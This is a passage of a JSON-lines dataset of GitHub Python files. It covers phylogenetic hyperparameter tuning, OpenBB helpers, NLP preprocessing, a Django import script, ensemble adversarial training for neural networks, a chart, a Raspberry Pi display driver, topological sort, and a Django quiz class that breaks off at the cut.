indel_params=True)\n\n transition_wrap_maker = TransitionWrapperMaker(\n tree_split.val_clt,\n tree_split.val_bcode_meta,\n max_extra_steps,\n max_sum_states)\n scorer = LikelihoodScorer(\n get_randint(), # seed\n tree_split.val_clt,\n tree_split.val_bcode_meta,\n # No iterations because we just want to evaluate a probability\n max_iters=0,\n num_inits=1,\n transition_wrap_maker=transition_wrap_maker,\n fit_param_list=[fit_params],\n known_params=all_known_params,\n use_poisson=use_poisson,\n scratch_dir=scratch_dir)\n worker_list.append(scorer)\n\n job_manager = SubprocessManager(\n worker_list,\n None,\n scratch_dir,\n num_processes)\n 
worker_results = [w[0][0] for w in job_manager.run()]\n\n # Get Pr(V|T)\n hyperparam_scores = [\n res.log_lik - pen_param_res.log_lik\n for res, (pen_param_res, _) in zip(worker_results, pen_param_results)]\n tot_hyperparam_score = np.mean(hyperparam_scores)\n logging.info(\"all Pr(Val given T) %s (sum %f)\", hyperparam_scores, tot_hyperparam_score)\n return tot_hyperparam_score\n","repo_name":"matsengrp/gapml","sub_path":"gestalt/hyperparam_tuner.py","file_name":"hyperparam_tuner.py","file_ext":"py","file_size_in_byte":14548,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"85"} +{"seq_id":"28066031060","text":"# This is for helpers that do NOT import any OpenBB Modules\nfrom typing import Callable, Any, Literal\nimport os\n\nfrom rich.console import Console\n\nconsole = Console()\n\nmenus = Literal[\"\", \"featflags\", \"settings\"]\n\n\ndef handle_error(name: str, default: Any, menu: menus = \"\"):\n \"\"\"Handles the error by returning the default value and printing an\n informative error message.\n\n Parameters\n ----------\n name: str\n The name of the environment variable\n default: Any\n The value to return if the converter fails\n menu: menus\n If provided, will tell the user where to fix the setting\n\n Returns\n ----------\n Any\n The default value\n\n \"\"\"\n base = f\"[red]Invalid variable provided for variable '{name}'.\"\n if menu:\n base += f\" Please change the setting in the `{menu}` menu.\"\n base += \"[/red]\\n\"\n console.print(base)\n return default\n\n\ndef load_env_vars(\n name: str, converter: Callable, default: Any, menu: menus = \"\"\n) -> Any:\n \"\"\"Loads an environment variable and attempts to convert it to the correct data type.\n Will return the provided default if it fails\n\n Parameters\n ----------\n name: str\n The name of the environment variable\n converter: Callable\n The function to convert the env variable to the desired format\n default: Any\n The value to return if the converter fails\n menu: menus\n If provided, will tell the user where to fix the setting\n\n Returns\n ----------\n Any\n The value or the default\n \"\"\"\n raw_var = os.getenv(name, str(default))\n try:\n return converter(raw_var)\n except ValueError:\n return handle_error(name, default, menu)\n except AttributeError:\n return handle_error(name, default, menu)\n except TypeError:\n return handle_error(name, default, menu)\n\n\ndef strtobool(val):\n \"\"\"Convert a string representation of truth to true (1) or false (0).\n\n True values are 'y', 'yes', 't', 'true', 'on', and '1'; false values\n are 'n', 'no', 'f', 'false', 'off', and '0'. 
Raises ValueError if\n 'val' is anything else.\n \"\"\"\n val = str(val).lower()\n if val in (\"y\", \"yes\", \"t\", \"true\", \"on\", \"1\"):\n output = 1\n elif val in (\"n\", \"no\", \"f\", \"false\", \"off\", \"0\"):\n output = 0\n else:\n raise ValueError(f\"invalid truth value {val}\")\n\n return output\n","repo_name":"irvinbma/OpenBBTerminal-Finance","sub_path":"openbb_terminal/base_helpers.py","file_name":"base_helpers.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"74671117396","text":"\"\"\"\n NLPre is a text (pre)-processing library that helps smooth some of the inconsistencies found in real-world data.\n Correcting for issues like random capitalization patterns, strange hyphenations,\n and abbreviations are essential parts of wrangling textual data but are often left to the user.\n\n This is derived from this repo: https://github.com/NIHOPA/NLPre\n\n This script has an example text taken from:\n https://www.gov.uk/drug-safety-update/vivaglobin-solution-for-subcutaneous-injection-rare-risk-of-thromboembolic-events\n\n Have the option to use custom dictionary:\n\n https://github.com/NIHOPA/NLPre/blob/master/nlpre/replace_from_dictionary.py\n\"\"\"\n\n\nfrom nlpre import titlecaps, dedash, identify_parenthetical_phrases\nfrom nlpre import replace_acronyms, replace_from_dictionary\nimport nlpre\nimport logging\nnlpre.logger.setLevel(logging.INFO)\n\ntext = \"\"\"\n Vivaglobin 160 mg/mL (human normal immunoglobin solution for subcutaneous injection) is licensed as replacement\n therapy for adults and children with primary immunodeficiency syndromes, myeloma, or chronic lymphatic leukaemia.\n \"\"\"\nprefix = 'MeSH_'\n\nprint(\"The original text: \", {text})\n\nABBR = identify_parenthetical_phrases()(text)\nparsers = [dedash(), titlecaps(), replace_acronyms(ABBR),\n replace_from_dictionary(prefix=prefix)]\nfor f in parsers:\n text = f(text)\nlogging.info(f\"--- The words in the chosen dictionary are now prefixed with {prefix}\")\nprint(\"The processed text: \", {text})\n\n","repo_name":"mammykins/govuk-scispacy","sub_path":"pre_processing_health_data.py","file_name":"pre_processing_health_data.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74837131476","text":"from row.models import Athlete\nimport sys\n\nold = Athlete.objects.all()\nfor item in old:\n\told.delete()\n\nf = open(\"rowers\")\n\n# name,side,year,status,height \nfor line in f:\n\tfields = line.split(\",\")\n\tathlete = Athlete(name=fields[0], side=fields[1], year=fields[2], status=fields[3], height=int(fields[4]))\n\tathlete.save()","repo_name":"eswalker/cos333","sub_path":"rowsite/bulkadd.py","file_name":"bulkadd.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21333550246","text":"\"\"\"\nStandard Adversarial Training\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nfrom tqdm import tqdm\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\n\nfrom utils.utils import *\nfrom train.train_base import TrainerBase\nfrom utils.AverageMeter import AverageMeter\nfrom torch.cuda.amp import autocast as autocast\n\n\nclass TrainerEns(TrainerBase):\n def __init__(self, cfg, writer, device, loss_function=torch.nn.CrossEntropyLoss(), static_model=None,\n holdout_model=None):\n 
super(TrainerEns, self).__init__(cfg, writer, device, loss_function)\n self.static_model = static_model\n self.holdout_model = holdout_model\n self.num_static_model = len(self.static_model)\n\n def train_one_epoch(self, model, train_loader, optimizer, epoch):\n nat_result = AverageMeter()\n adv_w_result = AverageMeter()\n adv_b_result = AverageMeter()\n with tqdm(total=len(train_loader)) as _tqdm:\n _tqdm.set_description('epoch:{}/{} Training:'.format(epoch + 1, self.cfg.TRAIN.epochs))\n for idx, (data, label) in enumerate(train_loader):\n n = data.size(0)\n data, label = data.to(self.device), label.to(self.device)\n # Random choice\n selected = np.random.randint(self.num_static_model + 1)\n if selected == self.num_static_model:\n selected_model = model\n else:\n selected_model = self.static_model[selected]\n selected_model.eval()\n\n attack_method = self._get_attack(selected_model, self.cfg.ADV.TRAIN.method, self.cfg.ADV.TRAIN.eps,\n self.cfg.ADV.TRAIN.alpha, self.cfg.ADV.TRAIN.iters)\n\n model.train()\n # Forward\n if self.amp:\n with autocast():\n adv_data = attack_method(data, label)\n nat_output = model(data)\n adv_output = model(adv_data)\n nat_loss = self.loss_fn(nat_output, label)\n adv_loss = self.loss_fn(adv_output, label)\n loss = 0.5 * (nat_loss + adv_loss)\n else:\n adv_data = attack_method(data, label)\n nat_output = model(data)\n adv_output = model(adv_data)\n nat_loss = self.loss_fn(nat_output, label)\n adv_loss = self.loss_fn(adv_output, label)\n loss = 0.5 * (nat_loss + adv_loss)\n\n # Backward\n if self.amp:\n optimizer.zero_grad()\n self.scaler.scale(loss).backward()\n self.scaler.step(optimizer)\n self.scaler.update()\n else:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Validation during training\n if (idx + 1) % self.cfg.TRAIN.print_freq == 0 or (idx + 1) == len(train_loader):\n # clean data\n with torch.no_grad():\n nat_output = model(data)\n nat_correct_num = (torch.max(nat_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()). \\\n astype(int).sum()\n nat_result.update(nat_correct_num, n)\n\n # white-box adv attack\n attack_method = self._get_attack(model, self.cfg.ADV.TRAIN.method, self.cfg.ADV.TRAIN.eps,\n self.cfg.ADV.TRAIN.alpha, self.cfg.ADV.TRAIN.iters)\n adv_data_w = attack_method(data, label)\n with torch.no_grad():\n adv_w_output = model(adv_data_w)\n adv_w_correct_num = (torch.max(adv_w_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()).\\\n astype(int).sum()\n adv_w_result.update(adv_w_correct_num, n)\n\n # black-box adv attack\n attack_method = self._get_attack(self.holdout_model, self.cfg.ADV.TRAIN.method, self.cfg.ADV.TRAIN.eps,\n self.cfg.ADV.TRAIN.alpha, self.cfg.ADV.TRAIN.iters)\n adv_data_b = attack_method(data, label)\n with torch.no_grad():\n adv_b_output = model(adv_data_b)\n adv_b_correct_num = (torch.max(adv_b_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()). 
\\\n astype(int).sum()\n adv_b_result.update(adv_b_correct_num, n)\n\n _tqdm.set_postfix(loss='{:.3f}'.format(loss.item()),\n nat_acc='{:.3f}%'.format(nat_result.acc_cur * 100),\n wb_rob_acc='{:.3f}%'.format(adv_w_result.acc_cur * 100),\n bb_rob_acc='{:.3f}%'.format(adv_b_result.acc_cur * 100))\n if not idx + 1 == len(train_loader):\n _tqdm.update(self.cfg.TRAIN.print_freq)\n else:\n _tqdm.update(len(train_loader) % self.cfg.TRAIN.print_freq)\n\n if self.writer is not None:\n self.writer.add_scalar('Train/Loss_adv', adv_loss.item(), self._iter)\n self.writer.add_scalar('Train/Loss_nat', nat_loss.item(), self._iter)\n self.writer.add_scalar('Train/Nat._Acc', nat_result.acc_cur * 100, self._iter)\n self.writer.add_scalar(f'Train/{self._get_attack_name()}_Whitebox_Acc',\n adv_w_result.acc_cur * 100, self._iter)\n self.writer.add_scalar(f'Train/{self._get_attack_name()}_Blackbox_Acc',\n adv_b_result.acc_cur * 100, self._iter)\n self.writer.add_scalar('Train/Lr', optimizer.param_groups[0][\"lr\"], self._iter)\n self._iter += 1\n self.scheduler.step()\n\n def train(self, model, train_loader, valid_loader):\n opt = torch.optim.SGD(model.parameters(), self.cfg.TRAIN.lr, weight_decay=self.cfg.TRAIN.weight_decay,\n momentum=self.cfg.TRAIN.momentum)\n self.scheduler = self.get_lr_scheduler(opt, self.cfg.TRAIN.lr_scheduler_name, len(train_loader))\n\n for epoch in range(0, self.cfg.TRAIN.epochs):\n # training\n self.train_one_epoch(model, train_loader, opt, epoch)\n\n # validation\n valid_acc, valid_adv_w_acc, valid_adv_b_acc = self.valid(model, valid_loader)\n\n if valid_adv_b_acc >= self.best_robust_acc:\n self.best_clean_acc = valid_acc\n self.best_robust_acc = valid_adv_b_acc\n self.best_epoch = epoch\n self.save_checkpoint(model, epoch, is_best=True)\n\n print(f'[EVAL] [{epoch}]/[{self.cfg.TRAIN.epochs}]:\\n'\n f'nat_acc:{valid_acc * 100}% adv_w_acc:{valid_adv_w_acc * 100}% adv_w_acc:{valid_adv_b_acc * 100}%\\n'\n f'best_epoch:{self.best_epoch}\\tbest_rob_acc:{self.best_robust_acc * 100}%\\n')\n\n # write to TensorBoard\n if self.writer is not None:\n self.writer.add_scalar('Valid/Nat._Acc', valid_acc, epoch)\n self.writer.add_scalar(f'Valid/{self._get_attack_name(train=False)}_Whitebox_Acc', valid_adv_w_acc,\n epoch)\n self.writer.add_scalar(f'Valid/{self._get_attack_name(train=False)}_Blackbox_Acc', valid_adv_b_acc,\n epoch)\n\n # save checkpoint\n if self.cfg.TRAIN.save_ckp_freq != -1 and epoch % self.cfg.TRAIN.save_ckp_freq == 0:\n self.save_checkpoint(model, epoch)\n\n def valid(self, model, valid_loader):\n nat_result = AverageMeter()\n adv_w_result = AverageMeter()\n adv_b_result = AverageMeter()\n attack_method_w = self._get_attack(model, self.cfg.ADV.TRAIN.method, self.cfg.ADV.TRAIN.eps,\n self.cfg.ADV.TRAIN.alpha, self.cfg.ADV.TRAIN.iters)\n attack_method_b = self._get_attack(self.holdout_model, self.cfg.ADV.TRAIN.method, self.cfg.ADV.TRAIN.eps,\n self.cfg.ADV.TRAIN.alpha, self.cfg.ADV.TRAIN.iters)\n\n model.eval()\n with torch.no_grad():\n with tqdm(total=len(valid_loader)) as _tqdm:\n _tqdm.set_description('Validating:')\n for idx, (data, label) in enumerate(valid_loader):\n data, label = data.to(self.device), label.to(self.device)\n n = data.size(0)\n\n # validation using natural data\n nat_output = model(data)\n nat_correct_num = (torch.max(nat_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()). 
\\\n astype(int).sum()\n nat_result.update(nat_correct_num, n)\n\n # adv attack\n with torch.enable_grad():\n adv_w_data = attack_method_w(data, label)\n adv_b_data = attack_method_b(data, label)\n\n adv_w_output = model(adv_w_data)\n adv_b_output = model(adv_b_data)\n\n adv_w_correct_num = (\n torch.max(adv_w_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()). \\\n astype(int).sum()\n adv_w_result.update(adv_w_correct_num, n)\n\n adv_b_correct_num = (\n torch.max(adv_b_output, dim=1)[1].cpu().detach().numpy() == label.cpu().numpy()). \\\n astype(int).sum()\n adv_b_result.update(adv_b_correct_num, n)\n\n if self.cfg.method != 'nature':\n _tqdm.set_postfix(nat_acc='{:.3f}%'.format(nat_result.acc_avg * 100),\n rob_w_acc='{:.3f}%'.format(adv_w_result.acc_avg * 100),\n rob_b_acc='{:.3f}%'.format(adv_b_result.acc_avg * 100))\n\n _tqdm.update(1)\n model.train()\n return nat_result.acc_avg, adv_w_result.acc_avg, adv_b_result.acc_avg\n","repo_name":"CHENBIN99/Adversarial-training","sub_path":"train/train_ens_adv.py","file_name":"train_ens_adv.py","file_ext":"py","file_size_in_byte":10607,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"22080934386","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef draw_stylish_wheel_of_life(data, categories, title=\"Wheel of Life\"):\n N = len(categories)\n theta = np.linspace(0.0, 2 * np.pi, N, endpoint=False)\n radii = data\n width = np.pi / 4 * np.ones(N)\n\n fig, ax = plt.subplots(figsize=(6,6), subplot_kw={'projection': 'polar'})\n bars = ax.bar(theta, radii, width=width, bottom=0.0, align='center', edgecolor='gray', linewidth=0.5)\n\n # A clearer color palette - can be customized\n colors = [\"#FF9999\", \"#66B2FF\", \"#99FF99\", \"#FFCC99\", \"#FFD700\", \"#C71585\", \"#20B2AA\", \"#FF4500\"]\n for bar, color in zip(bars, colors):\n bar.set_facecolor(color)\n bar.set_alpha(0.7)\n\n # Remove gridlines and outer circle (spine)\n ax.yaxis.grid(False)\n ax.xaxis.grid(False)\n ax.spines[\"polar\"].set_visible(False)\n\n # Remove ytick labels and set xtick labels with padding and custom font properties\n ax.set_yticklabels([])\n ax.set_xticks(theta)\n ax.set_xticklabels(categories, fontdict={'fontsize': 10, 'fontweight': 'bold', 'color': '#555555'})\n\n # Set title with custom font properties\n ax.set_title(title, va='bottom', fontdict={'fontsize': 14, 'fontweight': 'bold'})\n\n # Add padding to the image\n plt.tight_layout()\n\n # Save as a high-res image with a transparent background\n plt.savefig(\"stylish_wheel_of_life.png\", dpi=300, bbox_inches='tight', transparent=True)\n plt.show()\n\ndata_points = [5, 7, 3, 8, 9, 4, 7, 6]\nareas = [\"Health\", \"Relationships\", \"Career\", \"Finance\", \"Learning\", \"Leisure\", \"Physical Environment\", \"Personal Growth\"]\n\ndraw_stylish_wheel_of_life(data_points, areas)\n\n","repo_name":"rafimk/chart-app","sub_path":"chart-app.py","file_name":"chart-app.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"32536743885","text":"\n# Project: \t\tCS426 Spring 2018, Team #23: SkyWarden ADNS Senior Project, Aerial Drone Notification System (ADNS) \n# Team:\t\t\tRony Calderon, Bryan Kline, Jia Li, Robert Watkins\n# Subsystem:\tGround Base Unit\n# File name:\tPinSevenSegment.py \n# Description:\tPinSevenSegment class implementation\t\n#\t\t\t\tSevenSegment class establishes one four digit seven segment displays\n#\t\t\t\tand 
continually writes four digit values to it, values corresponding to \n#\t\t\t\tthe voltage from the drone created for the 5641AS Common Anode Seven Segment \n#\t\t\t\tDisplay, acts as backup for the ShiftSevenSegment class in the event that\n#\t\t\t\tthe module containing two seven segment displays controlled by a shift register\n#\t\t\t\tand D-latch fails\n\n# Hardware:\n# Seven Segment Display:\t\t\t5641AS Common Anode Seven Segment Display\n\nfrom gpiozero import LED\nfrom time import sleep\n\nclass PinSevenSegment:\n\n\t# constant for pins on the Raspberry Pi\n\t__D0_PIN = 27\n\t__D1_PIN = 22\n\t__D2_PIN = 23\n\t__D3_PIN = 24\n\t__DP_PIN = 21\n\t__A_PIN = 20\n\t__B_PIN = 16\n\t__C_PIN = 26\n\t__D_PIN = 19\n\t__E_PIN = 13\n\t__F_PIN = 6\n\t__G_PIN = 5\n\t\n\t__PERIOD_CHAR = '.'\n\t__DISPLAY_DELAY = 0.005\n\t__MAX_DIGITS = 4\n\t\n\t# creation of pin objects\n\t__D0 = LED(__D0_PIN)\n\t__D1 = LED(__D1_PIN)\n\t__D2 = LED(__D2_PIN)\n\t__D3 = LED(__D3_PIN)\n\n\t__A = LED(__A_PIN)\n\t__B = LED(__B_PIN)\n\t__C = LED(__C_PIN)\n\t__D = LED(__D_PIN)\n\t__E = LED(__E_PIN)\n\t__F = LED(__F_PIN)\n\t__G = LED(__G_PIN)\n\t__DP = LED(__DP_PIN)\n\t\n\t# Name:\t\t\tDefault constructor\n\t# Description:\tPinSevenSegment class default constructor which initializes the display\n\t#\t\t\t\tby zeroing out the pins and digits\n\t# Parameters:\tNone\n\t# Return:\t\tNone\n\tdef __init__(self):\n\t\t\n\t\tself.allPinsOff()\n\t\tself.zero()\n\n\t# Name:\t\t\tallPinsOff\n\t# Description:\tPinSevenSegment class method which writes all digit pins high which turns them\n\t# \t\t\t\toff\n\t# Parameters:\tNone\n\t# Return:\t\tNone\n\tdef allPinsOff(self):\n\t\t\n\t\tself.__D0.on()\n\t\tself.__D1.on()\n\t\tself.__D2.on()\n\t\tself.__D3.on()\n\n\t# Name:\t\t\tzero\n\t# Description:\tPinSevenSegment class method which writes all segment pins low which turns\n\t# \t\t\t\tthem off, zeroing out the digit\n\t# Parameters:\tNone\n\t# Return:\t\tNone\n\tdef zero(self):\n\n\t\tself.__A.off()\n\t\tself.__B.off()\n\t\tself.__C.off()\n\t\tself.__D.off()\n\t\tself.__E.off()\n\t\tself.__F.off()\n\t\tself.__G.off()\n\t\tself.__DP.off()\n\n\t# Name:\t\t\tselectDigit\n\t# Description:\tPinSevenSegment class method which takes in the digit to be activated, turns\n\t# \t\t\t\tall digits off, and then activates the one passed in as a parameter \n\t# Parameters:\tTakes in an int corresponding to the digit on the display which will be\n\t# \t\t\t\tactivated\n\t# Return:\t\tNone\n\tdef selectDigit(self, digit):\n\t\t\n\t\tself.allPinsOff()\n\n\t\tif digit == 0:\n\t\t\tself.__D0.off()\t\n\t\tif digit == 1:\n\t\t\tself.__D1.off()\n\t\tif digit == 2:\n\t\t\tself.__D2.off()\n\t\tif digit == 3:\n\t\t\tself.__D3.off()\n\n\t# Name:\t\t\tallOn\n\t# Description:\tPinSevenSegment class method which turns all digits and all segments on for\n\t#\t\t\t\ttesting purposes\n\t# Parameters:\tNone\n\t# Return:\t\tNone\n\tdef allOn(self):\n\t\t\n\t\tself.__D0.off()\n\t\tself.__D1.off()\n\t\tself.__D2.off()\n\t\tself.__D3.off()\n\t\t\n\t\tself.__A.on()\n\t\tself.__B.on()\n\t\tself.__C.on()\n\t\tself.__D.on()\n\t\tself.__E.on()\n\t\tself.__F.on()\n\t\tself.__G.on()\n\t\tself.__DP.on()\n\n\t# Name:\t\t\tdisplayNumber\n\t# Description:\tPinSevenSegment class method which takes in strings corresponding to the voltage value\n\t# \t\t\t\tto be displayed on the seven segment and the proximity threshold which is only\n\t# \t\t\t\tincluded so as to make the interface compatible with the class method's use\n\t# \t\t\t\telsewhere in the program and which is discarded\n\t# 
Parameters:\tTakes in two strings, the voltage value and the proximity value, both as strings\n\t# Return:\t\tNone\n\tdef displayNumber(self, voltage, proximity):\n\n\t\tvoltageSize = len(voltage)\n\t\t\n\t\tif voltageSize > 0:\n\t\t\tdecimal = False\n\n\t\t\t# the string is reversed so that the least significant digits are \n\t\t\t# at the front of the string \n\t\t\tvoltageString = \"\".join(reversed(voltage))\n\t\t\t\n\t\t\tdigitSelect = 0\n\t\t\tcounter = 0\n\n\t\t\t# iterates through the string and writes it, digit by digit, to the\n\t\t\t# seven segment display\n\t\t\twhile counter < voltageSize and digitSelect < self.__MAX_DIGITS:\n\t\t\t\n\t\t\t\t# if a decimal point is encountered, a bool is set and the position in\n\t\t\t\t# the string is advanced past it\n\t\t\t\tif voltageString[counter] == self.__PERIOD_CHAR:\n\t\t\t\t\tdecimal = True \n\t\t\t\t\tcounter += 1\n\n\t\t\t\t# the previous number is zeroed out and the appropriate digit on the \n\t\t\t\t# seven segment is selected\n\t\t\t\tself.zero()\n\t\t\t\tself.selectDigit(digitSelect)\n\t\t\t\t\n\t\t\t\t# the current digit in the string is written to the seven segment display,\n\t\t\t\t# a sleep is used to make the digit visible to the eye\n\t\t\t\tself.numberSelect(voltageString[counter], decimal)\n\t\t\t\tsleep(self.__DISPLAY_DELAY)\n\n\t\t\t\tdecimal = False\n\t\t\t\tcounter += 1\n\t\t\t\tdigitSelect += 1\n\n\t# Name:\t\t\tnumberSelect\n\t# Description:\tPinSevenSegment class method takes in a char which is the number to be written\n\t# \t\t\t\tto the digit and a bool corresponding to whether or not the decimal point will\n\t# \t\t\t\tbe written, and inspects the number to determine which segments to write high\n\t# Parameters:\tTakes in the number to write to the digit as a char and a bool which determines\n\t# \t\t\t\twhether or not the decimal point will be written\n\t# Return:\t\tNone\n\tdef numberSelect(self, number, decimalPoint):\n\t\t\n\t\tif not number == '1' and not number == '4':\n\t\t\tself.__A.on()\n\t\tif not number == '5' and not number == '6':\n\t\t\tself.__B.on()\n\t\tif not number == '2':\n\t\t\tself.__C.on()\n\t\tif not number == '1' and not number == '4' and not number == '7' and not number == '9':\n\t\t\tself.__D.on()\n\t\tif number == '0' or number == '2' or number == '6' or number == '8':\n\t\t\tself.__E.on()\n\t\tif not number == '1' and not number == '2' and not number == '3' and not number == '7':\n\t\t\tself.__F.on()\n\t\tif not number == '0' and not number == '1' and not number == '7':\n\t\t\tself.__G.on()\n\t\t\t\n\t\tif decimalPoint:\n\t\t\tself.__DP.on()\n","repo_name":"SkyWarden/Aerial-Drone-Notification-System","sub_path":"SkyWarden Aerial Drone Notification System Source Code/Ground Base Unit and GUI Subsystems/Ground Unit Source Code/PinSevenSegment.py","file_name":"PinSevenSegment.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"72817696917","text":"\"\"\"\n\nDFS vs BFS\n4 type of basic Topo-sort question:\n- a. find any topo-order\n- b. is topo-order exist?\n- c. find ALL topo-order (DFS)\n- d. 
check if topo-order is unique (maximum 1 node in queue at all time)\n\nQuestions:\n- 268\n- 802\n- 484\n\"\"\"\n\nfrom collections import defaultdict, deque\nfrom typing import List\n\n\n# Definition for a Node.\nclass Node:\n def __init__(self, val=0, neighbors=None):\n self.val = val\n self.neighbors = neighbors if neighbors is not None else []\n\n def __repr__(self) -> str:\n return str(self.val)\n\n\nclass ClrsTopoSort:\n \"\"\"\n https://github.com/stevenhalim/cpbook-code/blob/master/ch4/traversal/toposort.py\n \"\"\"\n\n def toposort(self, V: int, AL: list[list[int]]):\n \"\"\"\n Runtime: 104 ms, faster than 43.92% of Python3 online submissions for Course Schedule II.\n\n XXX: no need of visited set, since CLRS depends on dfn (aka color)\n \"\"\"\n WHITE, GRAY, BLACK = 0, 1, 2\n cyclic = False\n dfn = defaultdict(int)\n ts = []\n\n def dfs(u):\n nonlocal cyclic\n if cyclic:\n return\n\n # !mark visiting here, rather before dfs. ow, we need to mark it in for u in range(V) as well.\n dfn[u] = GRAY\n for v in AL[u]:\n if dfn[v] == WHITE:\n dfs(v)\n elif dfn[v] == GRAY:\n cyclic = True\n dfn[u] = BLACK\n ts.append(u)\n\n for u in range(V):\n if dfn[u] == WHITE:\n dfs(u)\n if cyclic:\n return []\n return ts[::-1]\n\n\nclass BfsTopoSort:\n def findOrder(self, numCourses: int, prerequisites: List[List[int]]) -> List[int]:\n \"\"\"\n BEST topo-sort template for leetcode\n Runtime: 139 ms, faster than 57.89% of Python3 online submissions for Course Schedule II.\n\n T: O(E+V)\n \"\"\"\n AL = defaultdict(list)\n DEG = {u: 0 for u in range(numCourses)}\n for c, p in prerequisites:\n AL[p].append(c)\n DEG[c] += 1\n m = numCourses\n q = deque([i for i in range(m) if DEG[i] == 0])\n ts = []\n while q:\n u = q.popleft()\n ts.append(u)\n if len(ts) == m:\n return ts\n for v in AL[u]:\n DEG[v] -= 1\n if DEG[v] == 0:\n q.append(v)\n return []\n\n def bfs(self, start_node: Node):\n \"\"\"BFS used queue + dist map\n Use case\n ---\n * topological sorting\n * if puzzle has keyword: connection components\n * level order traversal\n * shortest path in Simple Graph\n * Given transform rule, find minimum steps to transform from init to target state\n\n Complexity\n ---\n Time: O(E+V)\n Space: O(V)\n \"\"\"\n # needs queue for BFS\n # and dist map to mark visited and SSSP\n q = deque([start_node])\n dist = {start_node: 0}\n\n while q:\n node = q.popleft()\n if self.is_target(node):\n return \"Found target\"\n for neig in node.neighbors:\n if neig in dist:\n continue\n q.append(neig)\n dist[neig] = dist[neig] + 1\n\n # if we need to find shortest dist from start_nodde to ALL other nodes\n return dist\n\n # if we need all Connected nodes\n return dist.keys\n\n # if we need SSSP from start to end node\n return dist[end_node]\n\n def topo_sort(self, nodes: List[Node]):\n \"\"\"Use BFS + in-degrees to topological sort\n it also do cycle check\n \"\"\"\n # calcuate in-degrees\n indegrees = self.calc_indegrees(nodes)\n\n # init queue with all nodes with 0 in-degree\n # XXX: till today I found topo-sort's init is ALL 0 in-degree nodes in q.\n # similar idea used in 542. 
01 Matrix: https://leetcode.com/problems/01-matrix/discuss/1369741/C%2B%2BJavaPython-BFS-DP-solutions-with-Picture-Clean-and-Concise-O(1)-Space\n q = deque([n for n in nodes if indegrees[n] == 0])\n\n # BFS to process all nodes: decrease indegrees\n topo_order = []\n while q:\n node = q.popleft()\n topo_order.append(node)\n for neig in node.neighbors:\n indegrees[neig] -= 1\n if indegrees[neig] == 0:\n q.append(neig)\n\n # check if cycle, cool!\n if len(topo_order) != len(nodes):\n return False, \"no topo order due to cycle!\"\n return topo_order\n\n def calc_indegrees(self, nodes: List[Node]):\n counter = {node: 0 for node in nodes}\n for node in nodes:\n for neig in node.neighbors:\n counter[neig] += 1\n return counter\n\n def is_target(self, node: Node):\n \"\"\"dummy endpoint check\"\"\"\n if node.val == 42:\n return True\n return False\n\n\nsl = BfsTopoSort()\nn0, n1, n2, n3 = Node(0), Node(1), Node(2), Node(3)\nn0.neighbors = [n1]\nn1.neighbors = [n2]\nn2.neighbors = [n3]\nn3.neighbors = [n1]\n\nprint(sl.topo_sort([n0, n1, n2, n3]))\n","repo_name":"fxrcode/LeetPy","sub_path":"Template/toposort.py","file_name":"toposort.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"9081703241","text":"from django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template import *\nfrom django.shortcuts import render_to_response, render\nfrom django.template.loader import render_to_string\nfrom django.template import RequestContext\nfrom django.http import *\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import *\nimport models\nimport datetime\nimport json\n# import forms\n\nclass Test:\n current_tests = {}\n \"\"\"A test class representing the test a user is taking\"\"\"\n def __init__(self, user):\n self.user = user\n self.score = 0\n # Ten questions in Ten minutes\n self.num_questions = 10\n self.duration = datetime.timedelta(minutes=10)\n self.num_solved_questions = 0\n self.questions_seen = []\n self.last_question, self.second_last_question = None, None\n self.current_difficulty = 4\n self.start_time = datetime.datetime.now()\n self.finish_time = self.start_time + self.duration\n self.current_question = self.get_new_question(self.current_difficulty)\n\n def get_new_question(self, difficulty):\n q = models.Question.objects.filter(difficulty=difficulty).order_by('?')[0]\n while q.pk in self.questions_seen:\n q = models.Question.objects.filter(difficulty=difficulty).order_by('?')[0]\n return q\n\n def solve_current(self, answer):\n if self.current_question.correct_option == answer:\n self.score += self.current_question.difficulty\n self.current_question.correct = True\n else:\n self.current_question.correct = False\n self.num_solved_questions += 1\n self.questions_seen.append(self.current_question.pk)\n self.second_last_question, self.last_question = self.last_question, self.current_question\n if self.second_last_question and self.last_question:\n if self.second_last_question.correct and self.last_question.correct:\n self.current_difficulty = min(10, self.current_difficulty + 1)\n elif (not self.second_last_question.correct) and (not self.last_question.correct):\n self.current_difficulty = max(1, self.current_difficulty - 1)\n if not self.finished:\n self.current_question = self.get_new_question(self.current_difficulty)\n\n @property\n def finished(self):\n return datetime.datetime.now() > 
